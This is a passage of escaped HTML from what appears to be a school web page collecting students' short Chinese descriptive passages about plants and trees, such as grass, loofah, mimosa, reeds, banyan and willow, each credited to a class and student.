serif;\">\u7576\u72c2\u98a8\u547c\u562f\u6210\u4e00\u652f\u83ef\u9e97\u7684\u821e\uff0c\u66b4\u96e8\u4e0b\u7684\u96dc\u8349\u4e5f\u96a8\u4e4b\u6416\u64fa\uff0c\u5c0f\u5c0f\u7684\u8eab\u8ec0\u633a\u4f4f\u4e86\u98a8\u66b4\u7684\u8ca0\u8377\uff0c\u4e00\u62b9\u967d\u5149\u64a5\u96f2\u50be\u7009\uff0c\u8207\u7da0\u8349\u4e0a\u7684\u9732\u73e0\u76f8\u8000\u6620\uff0c\u5728\u9019\u7247\u5ee3\u88a4\u7684\u6de8\u571f\u4e0a\uff0c\u6709\u7d72\u7d72\u7dbf\u5ef6\u7684\u7da0\u610f\u548c\u5805\u5f37\u7684\u751f\u547d\u97cc\u6027\u751f\u6839\u3002\uff08\u96dc\u8349\uff0f\u4e09\u7fa9<span> 05 <\/span>\u5433\u65af\u742a\uff09<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">17.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u7d30\u7d30\u5ae9\u7da0\u7684\u8396\u85e4\u596e\u529b\u6500\u4e0a\u74dc\u67b6\uff0c\u6372\u66f2\u518d\u6372\u66f2\uff0c\u967d\u5149\u4e0b\u958b\u51fa\u4e00\u6735\u6735\u91d1\u9ec3\u8272\u7684\u76fc\u671b\u3002\u4e0d\u4e45\uff0c\u68da\u67b6\u4e0b\u65b9\u5782\u91e3\u8457\u4e00\u689d\u689d\u8a98\u4eba\u7684\u7d72\u74dc\uff0c\u9b5a\u990c\u4f3c\u7684\u727d\u5f15\u8457\uff0c\u76f4\u5230\u300c\u4efb\u52d9\u300d\u5931\u6557\uff0c\u5f92\u7559\u4e0b\u5e03\u6eff\u6a6b\u659c\u7e96\u7dad\u7684\u9ec3\u8910\u4e7e\u7d6e<span>(<\/span>\u83dc\u74dc\u5e03<span>)<\/span>\uff0c\u7d72\u7d72\u90fd\u662f\u7b49\u5f85\u7684\u5370\u8a18\u3002\uff08\u7d72\u74dc\uff0f\u4e09\u7fa9<span>37<\/span>\u8b1d\u5982\u83c1\uff09<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">18.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u554a\uff01\u8981\u5c0f\u5fc3\u54ea\uff01\u982d\u9802\u4e0a\u90a3\u7247\u5de8\u5927\u7684\u828b\uff0c\u986b\u5371\u5371\u6258\u8457\u4e00\u9846\u53c8\u5927\u53c8\u91cd\u7684\u6c34\u6676\u7403\uff0c\u800c\u967d\u5149\u7a7f\u900f\u4e86\u8584\u8584\u7684\u3001\u534a\u900f\u660e\u7684\u5098\u9762\uff0c\u5728\u6211\u7684\u8eab\u4e0a\u6620\u8457\u5e7d\u7da0\u7684\u5149\u3002<span>(<\/span>\u59d1\u5a46\u828b\uff0f\u4e09\u516c\u3000\u694a\u5b9b\u82b8<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">19.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5728\u89f8\u78b0\u7684\u77ac\u9593\uff0c\u6025\u5fd9\u95d4\u4e0a\u4e86\u4f60\u7684\u8449\u3002\u4f60\u662f\u5426\u5982\u540c\u5b0c\u7f9e\u7684\u5c11\u5973\u822c\u654f\u611f\uff1f\u6211\u5011\u5728\u4e00\u65c1\u6232\u8b14\u5730\u6b23\u8cde\u4f60\u906e\u63a9\u81c9\u9f90\u90a3\u9752\u6f80\u7684\u6a21\u6a23\u3002<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u542b\u7f9e\u8349\uff0f\u4e09\u516c \u9673\u661f\u4f03<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">20.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u7247\u7247\u5b0c\u5c0f\u7cbe\u7dfb\u7684\u7fe0\u7fbd\uff0c\u8986\u6eff\u72f9\u7a84\u7684\u6ce5\u5730\uff0c\u50cf\u4e00\u96bb\u5de8\u9ce5\u8737\u66f2\u5728\u82b1\u76c6\u88e1\uff0c\u662f\u8ab0\u5927\u610f\u9a5a\u52d5\u4e86\u5b83\uff1f\u7a81\u7136\u9593\u6536\u8d77\u67d4\u8edf\u7684\u7fbd\u6bdb\uff0c\u4ed6\u70ba\u81ea\u5df1\u6b66\u88dd\u4e00\u6839\u6839\u5c16\u77db\u3002<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u54b8\u8c50\u8349\uff0f\u4e09\u516c\u3000\u9673\u8a60\u4f73<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">21.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u96a8\u624b\u6f86\u4e86\u5e7e\u676f\u6c34\uff0c\u6578\u9031\u5149\u666f\u5df2\u6500\u6eff\u4e00\u7247\u6b04\u5e72\uff0c\u8584\u8377\u6e05\u9999\u5e7d\u9060\uff0c\u50cf\u767e\u842c\u5e74\u524d\u5c31\u70d9\u5370\u5728\u9435\u5e72\u4e0a\uff0c\u8ff4\u9084\u66f2\u6298\uff1b\u537b\u53c8\u9752\u5ae9\u67d4\u8edf\uff0c\u628a\u9f3b\u8154\u6df1\u8655\u85b0\u5f97\u4f0f\u4f0f\u8cbc\u8cbc\u3002<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u8584\u8377\uff0f\u4e09\u516c\u3000\u6797\u7d39\u7de3<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">22.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6e05\u6668\uff0c\u7a97\u5916\u67d4\u8edf\u7dbf\u5bc6\u7684\u5ae9\u8349\u98fd\u5438\u9732\u6c34\uff0c\u9bae\u8106\u8c50\u6f64\uff0c\u6211\u8eba\u5728\u6a39\u4e0b\uff0c\u6e05\u5473\u60a0\u60a0\uff0c\u628a\u5922\u90fd\u67d3\u7da0\u4e86\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u8349\uff0f\u4e09\u516c\u3000\u6797\u7d39\u7de3<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">23.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5f37\u98a8\u63a0\u904e\uff0c\u4e00\u671b\u7121\u969b\u7684\u8349\u539f\u5982\u547c\u61c9\u822c\u96a8\u4e4b\u50be\u5012\uff0c\u81e3\u670d\u7684\u59ff\u614b\u6709\u5982\u62dc\u898b\u5e1d\u738b\u822c\u656c\u614e\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u8349\uff0f\u4e09\u516c\u3000\u9ec3\u5a55\u8335<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">24.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u593e\u7e2b\u88e1\u7684\u5c0f\u82b1\u9162\u6f3f\uff0c\u6643\u8457\u5e74\u8f15\u7684\u7b11\u81c9\uff0c\u7a7f\u8457\u9752\u7fe0\u7684\u670d\u88dd\uff0c\u63a2\u982d\u63a2\u8166\u7684\u5728\u98a8\u4e2d\u6416\u52d5\u3002<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u9162\u6f3f\u8349\uff0f\u4e09\u516c\u3000\u5c24\u6c90\u60e0<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">25.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u659c\u967d\u4e0b\uff0c\u7cbc\u7cbc\u91d1\u5149\u7051\u843d\u9ea5\u7530\uff0c\u4e00\u6ce2\u6ce2\u91d1\u9ec3\u9ea5\u6d6a\u96a8\u98a8\u76ea\u8d77\uff0c\u4e00\u9663\u9663\u6e05\u82b3\u7684\u7a3b\u9999\u96a8\u98a8\u8972\u4f86\uff0c\u4e00\u6bb5\u6bb5\u7b11\u8072\u593e\u96dc\u7684\u7ae5\u5e74\u4e5f\u96a8\u98a8\u64ad\u6620\u65bc\u8166\u6d77\u88e1\u3002<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u7a3b\uff0f\u4e09\u516c \u6c5f\u6021\u8476<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">26.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u7fe0\u8272\u7684\u85e4\u8513\u6500\u5728\u96d5\u98fe\u65e9\u5df2\u6a21\u7cca\u7684\u67f1\u4e0a\uff0c\u5982\u540c\u4e00\u5c3e\u9752\u7af9\u7d72\u822c\uff0c\u873f\u8712\u5730\u7dbb\u653e\u8457\u9bae\u8c54\u523a\u773c\u7684\u7da0\u3002\u85e4\u4e0a\u65b0\u5192\u51fa\u7684\u82bd\u8449\u96a8\u98a8\u6416\u66f3\uff0c\u6676\u9583\u8457\u8fe5\u7570\u65bc\u8396\u8eab\u7684\u7da0\uff0c\u2500\u5982\u8f1d\u7389\u822c\u9752\u7fe0\u3002\u9060\u9060\u770b\u53bb\uff0c\u4e0d\u540c\u5c64\u6b21\u7684\u7da0\u52fe\u52d2\u51fa\u4e00\u7247\u8c50\u5bcc\u7684\u6625\u610f\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u85e4\u8513\uff0f\u4e09\u8aa0<\/span><span style=\"font-size: 11pt;\">14<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6797\u5929\u5fc3<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">27.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u90a3\u662f\u7247\u7d14\u6f54\u7121\u7455\u7684\u767d\uff0c\u50cf\u662f\u63d0\u65e9\u8fce\u63a5\u96ea\u51b7\u7684\u5bd2\u51ac\uff0c\u4e5f\u50cf\u662f\u70ba\u901d\u53bb\u7684\u76db\u590f\u9ed8\u54c0\uff0c\u8072\u8072\u64bc\u52d5\u4eba\u5fc3\u7684\u9f13\u8072\uff0c\u547c\u61c9\u8457\u4ed6\u5011\u5728\u75be\u98a8\u4e2d\u6416\u64fa\u7684\u8170\u80a2\uff0c\u5f37\u97cc\u800c\u6709\u529b\u3002\u4ed6\u5011\u662f\u88ab\u6d41\u653e\u5230\u6ff1\u6d77\u7684\u65cf\u7fa4\uff0c\u537b\u64c1\u6709\u6700\u8056\u6f54\u7684\u9748\u9b42\uff0c\u4e00\u7c07\u7c07\u7684\u767d\uff0c\u4e0d\u662f\u82b1\uff0c\u662f\u90a3\u7d14\u6f54\u7684\u5fc3\uff0c\u662f\u7684\uff0c\u4ed6\u5011\u662f<\/span><span style=\"font-size: 11pt; font-family: Batang, serif;\">\u2014\u2014<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u8606\u8466\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u8606\u8466\uff0f\u4e09\u8aa0<\/span><span style=\"font-size: 11pt;\">15<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6797\u8c9d\u67d4<\/span><span style=\"font-size: 11pt;\">)<\/span><span style=\"line-height: 22pt; text-indent: -15.4pt;\">\u00a0<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">28.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u7b49\u5f85\u4e00\u9663\u98a8\u8d77\uff0c\u6490\u958b\u6bdb\u8338\u8338\u7684\u7d14\u767d\u5098\u67b6\uff0c\u5e36\u8457\u5b69\u7ae5\u7684\u7b11\u5bb9\uff0c\u4f60\u7684\u5e0c\u671b\uff0c\u6211\u7684\u5922\u60f3\uff0c\u5728\u9060\u8655\uff0c\u843d\u5730\u3001\u751f\u6839\u3002\uff08\u84b2\u516c\u82f1\uff0f\u4e09\u6bc5\u3000\u9673\u6c9b\u8aed\uff09<\/span><\/p>\n<p>&nbsp;<\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 57pt; text-indent: -21pt; line-height: 22pt;\">\n<hr class=\"system-pagebreak\" title=\"\u690d\u7269\u7684\u63cf\u5beb\uff1a\u6a39\" \/>\n<p>&nbsp;<\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 57pt; text-indent: -21pt; line-height: 22pt;\"><b><span style=\"font-size: 15pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif; color: #c00000;\">\u6a39<\/span><\/b><b><\/b><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">1.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u53c8\u662f\u6625\u53bb\u590f\u4f86\u7684\u6642\u523b\u3002\u5c71\u9593\u5f90\u5f90\u6e05\u98a8\u634e\u4f86\u5fae\u5fae\u99a8\u9999\uff0c\u9017\u8d77\u8001\u6995\u6a39\u6e05\u67d4\u7684\u7b11\u8072\u3002\u5982\u5782\u7c3e\u822c\u7684\u9b1a\u62c2\u904e\u5927\u5730\uff0c\u5b83\u6eab\u67d4\u5730\u70ba\u8eab\u4e0b\u7684\u5b69\u5b50\u8f15\u8072\u8a34\u8aaa\u767e\u5e74\u6545\u4e8b\u2026\u2026\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6a39\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">2.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u64ce\u5929\u64bc\u5730\uff0c\u90a3\u682a\u6a39\uff0c\u6eff\u8eab\u6b72\u6708\u7684\u942b\u523b\uff0c\u4e00\u5982\u8001\u4eba\u638c\u4e0a\u7684\u7d0b\u8def\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6a39\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">3.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u96ea\u7d6e\u98c4\u843d\u679d\u982d\uff0c\u5f77\u5f7f\u524d\u4e00\u523b\u9084\u90a3\u6a23\u76db\u653e\uff0c\u8f49\u77ac\u4fbf\u884c\u5c07\u5c31\u6728\uff0c\u4ed6\u986b\u5fae\u5fae\u5730\u6296\u4e86\u4e00\u4e0b\u4e7e\u67af\u7d30\u7626\u7684\u8eab\u9a45\uff0c\u628a\u6eff\u5fc3\u4e0d\u7518\u907a\u843d\u5728\u8150\u673d\u7684\u6839\u88e1\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6a39\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">4.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6625\u98a8\u62c2\u4f86\uff0c\u6b7b\u6c23\u6c89\u6c89\u7684\u67af\u6a39\u5192\u51fa\u9ede\u9ede\u65b0\u82bd\uff0c\u90a3\u9bae\u5ae9\u6b32\u6ef4\u7684\u9752\u7da0\u6d78\u8457\u6676\u7469\u5254\u900f\u7684\u9732\u73e0\uff0c\u6a39\u5152\u53c8\u5145\u6eff\u751f\u6a5f\uff0c\u7da0\u610f\u76ce\u7136\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6a39\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">5.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5bd2\u98a8\u6dd2\u53b2\uff0c\u67af\u9ec3\u7684\u6b98\u8449\u5728\u98a8\u4e2d\u986b\u5dcd\u5dcd\u5730\u6296\u7d22\u8457\uff0c\u8001\u6a39\u596e\u529b\u63ee\u821e\u679d\u690f\uff0c\u652b\u4f4f\u5929\u908a\u7684\u4e00\u62b9\u85cd\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6a39\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">6.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u70c8\u967d\u5f9e\u6a39\u8449\u9593\u7684\u7e2b\u9699\u64f2\u51fa\u4e00\u679a\u679a\u9583\u4eae\u7684\u91d1\u5e63\uff0c\u6eff\u5730\u53ee\u53ee\u5679\u5679\uff0c\u594f\u51fa\u4e00\u66f2\u76db\u590f\u7684\u4ea4\u97ff\u66f2\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6a39\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">7.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e00\u689d\u689d\u7d30\u9577\u5982\u91dd\u7684\u8449\uff0c\u5728\u96e8\u6c34\u7684\u6d17\u6ecc\u4e0b\uff0c\u639b\u4e0a\u4e86\u4e00\u9846\u9846\u6676\u7469\u5254\u900f\u7684\u6dda\u73e0\uff0c\u8f15\u8f15\u4e00\u78b0\u5c31\u843d\u5730\uff0c\u6ef4\u6210\u8f15\u8f15\u7684\u5606\u606f\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6a39\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">8.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e00\u9846\u6930\u5b50\u5f9e\u6a39\u4e0a\u8e8d\u4e0b\uff0c\u5321\u5577\u4e00\u8072\u7838\u5728\u4eba\u884c\u9053\u4e0a\uff0c\u6ffa\u51fa\u4e86\u76db\u590f\u7684\u6c34\u82b1\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6a39\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">9.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5abd\u7956\u5edf\u65c1\uff0c\u4e00\u68f5\u8001\u6995\u9738\u6c23\u7684\u8073\u7acb\u8457\uff0c\u5c07\u5b83\u9b31\u9b31\u84bc\u84bc\u7684\u679d\u8449\u5411\u78a7\u85cd\u7684\u9752\u5929\u4f38\u5c55\uff0c\u5e87\u852d\u8457\u6a39\u4e0b\u6b47\u606f\u7684\u5c45\u6c11\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6a39\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">10.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u767d\u5343\u5c64\u554a\uff0c\u767d\u5343\u5c64\uff01\u4f60\u4e00\u5c64\u4e00\u5c64\u525d\u958b\u7684\u662f\u6bcd\u89aa\u7684\u5fc3\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6a39\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">11.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6524\u958b\u6bb7\u7d05\u7684\u5c0f\u624b\u638c\uff0c\u5728\u79cb\u98a8\u88e1\uff0c\u6025\u5207\u5730\u60f3\u6293\u4f4f\u751a\u9ebc\uff0c\u537b\u53ea\u7559\u4e0b\u6eff\u5730\u7684\u7d05\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6a39\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">12.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u7f8c\u7b1b\u6bcb\u9808\u6028\u6211\uff0c\u6625\u98a8\u4e0d\u904e\u7389\u9580\u95dc\u3002\u96e2\u4eba\u5225\u6500\u6298\u6211\u7684\u679d\u689d\uff0c\u5782\u540a\u800c\u4e0b\u9bae\u5ae9\u7684\u7da0\uff0c\u662f\u6625\u5929\u7684\u751f\u6a5f\uff0c\u4e0d\u662f\u4f60\u5011\u7684\u6182\u6101\u3002\u89c0\u97f3\u5a18\u5a18\u8acb\u5225\u6ef4\u4e0b\u6211\u4fdd\u5b58\u5df2\u4e45\u7684\u7518\u9732\uff0c\u6211\u53ea\u60f3\u5728\u6cb3\u7554\u65c1\uff0c\u5b51\u7136\u4e00\u8eab\u96a8\u98a8\u6416\u66f3\u6211\u5e7d\u7da0\u7684\u5fc3\u3002\uff08\u694a\u67f3\uff0f\u4e09\u7fa9<\/span><span style=\"font-size: 11pt;\">41<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u912d\u79c0\u6986\uff09<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">13.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4f4e\u982d\u89aa\u543b\u8457\u6c34\u9762\uff0c\u5b0c\u5a9a\u7684\u67f3\u6a39\u9ed8\u9ed8\u7684\u88dd\u98fe\u8457\u6cb3\u7554\u3002\u4e00\u9663\u6625\u98a8\u5f90\u5f90\uff0c\u5979\u96a8\u8457\u98a8\u4e2d\u7684\u7cbe\u9748\u7fe9\u7fe9\u8d77\u821e\uff0c\u597d\u4e00\u500b\u9001\u5225\u7684\u5834\u666f\uff01\u7576\u5979\u8f15\u67d4\u5730\u5283\u7834\u6c34\u9762\u7684\u540c\u6642\uff0c\u4eba\u5011\u4f9d\u4f9d\u4e0d\u6368\uff0c\u4f46\u5979\u4e26\u4e0d\u61c2\u5f97\u4eba\u9593\u7684\u60b2\u50b7\uff0c\u53ea\u662f\u5782\u8457\u58a8\u7da0\u7684\u8170\u80a2\uff0c\u975c\u975c\u7684\u64e6\u4eae\u4e86\u6e56\u9762\u3002\uff08\u67f3\uff0f\u4e09\u7fa9<\/span><span style=\"font-size: 11pt;\">17 <\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5f90\u7469\u5a77\uff09<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">14.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6df1\u6dfa\u932f\u843d\u7684\u7da0\u610f\u9806\u8457\u679d\u5e79\u7684\u7dda\u689d\u8513\u5ef6\u81f3\u5404\u9685\uff0c\u4e00\u5e45\u6fc3\u6de1\u6709\u81f4\u7684\u6f51\u58a8\u756b<\/span><span style=\"font-size: 11pt; font-family: Batang, serif;\">\u2014\u2014<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6fc3\u7a20\u7684\u58a8\u7da0\u7dbb\u653e\u5728\u7626\u786c\u7684\u679d\u690f\u9802\u7aef\uff0c\u7fe0\u7da0\u8272\u7684\u5ae9\u8449\u7db4\u65bc\u5176\u9593\u3002\u79cb\u5929\u7684\u96e8\uff0c\u4e0b\u5230\u9ec3\u660f\u4ecd\u662f\u9ede\u9ede\u6ef4\u6ef4\uff0c\u662f\u8ab0\u7684\u5bc2\u5bde\u592a\u539a\uff0c\u53cd\u602a\u4f60\u9396\u4f4f\u6e05\u79cb\uff1f\u537b\u6c92\u5728\u4e09\u6708\u898b\u904e\u4f60\uff0c\u5fae\u98a8\u62c2\u4f86\u4e00\u628a\u66e6\u5149\uff0c\u7051\u843d\u5728\u4f60\u7684\u81c2\u8180\uff0c\u7adf\u4eff\u82e5\u92ea\u4e0a\u91d1\u7c89\uff0c\u90a3\u662f\u9cf3\u51f0\u4e5f\u8a60\u5606\u904e\u7684\u9ad8\u8cb4\u3002\u6c34\u6c23\u6c24\u6c33\uff0c\u6d78\u67d3\u8457\u6625\u7684\u76ce\u7136\uff0c\u4e5f\u6cb8\u9a30\u4e86\u90a3\u4e00\u8072\u8072\u300c\u975e\u68a7\u4e0d\u68f2\u300d\u3002\uff08\u68a7\u6850\uff0f\u4e09\u7fa9<\/span><span style=\"font-size: 11pt;\">18<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, 